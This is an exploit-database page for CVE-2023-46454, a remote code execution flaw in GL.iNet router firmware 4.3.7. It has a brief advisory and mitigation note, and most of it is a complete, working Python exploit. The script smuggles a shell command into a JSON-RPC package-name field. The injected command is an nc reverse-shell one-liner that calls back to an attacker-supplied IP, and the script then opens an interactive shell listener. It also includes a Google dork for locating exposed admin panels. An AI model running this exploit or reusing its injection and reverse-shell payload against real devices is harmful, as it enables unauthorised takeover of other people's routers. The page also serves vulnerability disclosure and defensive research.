GL.iNet - exploit.company

vendor:

GL.iNet

by:

Michele 'cyberaz0r' Di Bonaventura

8.1

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: GL.iNet

Affected Version From: 4.3.2007

Affected Version To: 4.3.2007

Patch Exists: NO

Related CWE: CVE-2023-46454

CPE:

Metasploit:

Other Scripts:

Platforms Tested: GL.iNet AR300M

2023

GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client

The GL.iNet version 4.3.7 is vulnerable to remote code execution via the OpenVPN client. By exploiting this vulnerability, an attacker can execute arbitrary code on the target system. This vulnerability has been assigned the CVE-2023-46454.

Mitigation:

To mitigate this vulnerability, users are advised to update GL.iNet to a version beyond 4.3.7. Additionally, it is recommended to restrict network access to the vulnerable system.

Source

Exploit-DB raw data:

#!/usr/bin/env python3

# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46454

import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def trigger_revshell(url, auth_token, payload):
	sleep(0.25)
	data = {
		'jsonrpc': '2.0',
		'id': randint(1000, 9999),
		'method': 'call',
		'params': [
			auth_token,
			'plugins',
			'get_package_info',
			{'name': 'bas{}e-files'.format(payload)}
		]
	}
	requests.post(url, json=data, verify=False)

def get_command_response(s):
	res = ''
	while True:
		try:
			resp = s.recv(1).decode('utf-8')
			res += resp
		except UnicodeDecodeError:
			pass
		except socket.timeout:
			break
	return res

def revshell_listen(revshell_ip, revshell_port):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(5)

	try:
		s.bind((revshell_ip, int(revshell_port)))
		s.listen(1)
	except Exception as e:
		print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
		exit(1)

	try:
		clsock, claddr = s.accept()
		clsock.settimeout(2)
		if clsock:
			print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
			res = ''
			while True:
				command = input('$ ')
				clsock.sendall('{}\n'.format(command).encode('utf-8'))
				stdout.write(get_command_response(clsock))

	except socket.timeout:
		print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
		s.close()

	except KeyboardInterrupt:
		print('\n[*] Closing connection')
		try:
			clsock.close()
		except socket.error:
			pass
		except NameError:
			pass
		s.close()

def main(base_url, auth_token, revshell_ip, revshell_port):
	print('[+] Started GL.iNet <= 4.3.7 RCE exploit')

	payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
	print('[+] Reverse shell payload: "{}"'.format(payload))

	print('[*] Triggering reverse shell connection')
	Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()

	print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
	revshell_listen(revshell_ip, revshell_port)

	print('[+] Done')

if __name__ == '__main__':
	if len(argv) < 5:
		print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
		exit(1)

	main(argv[1], argv[2], argv[3], argv[4])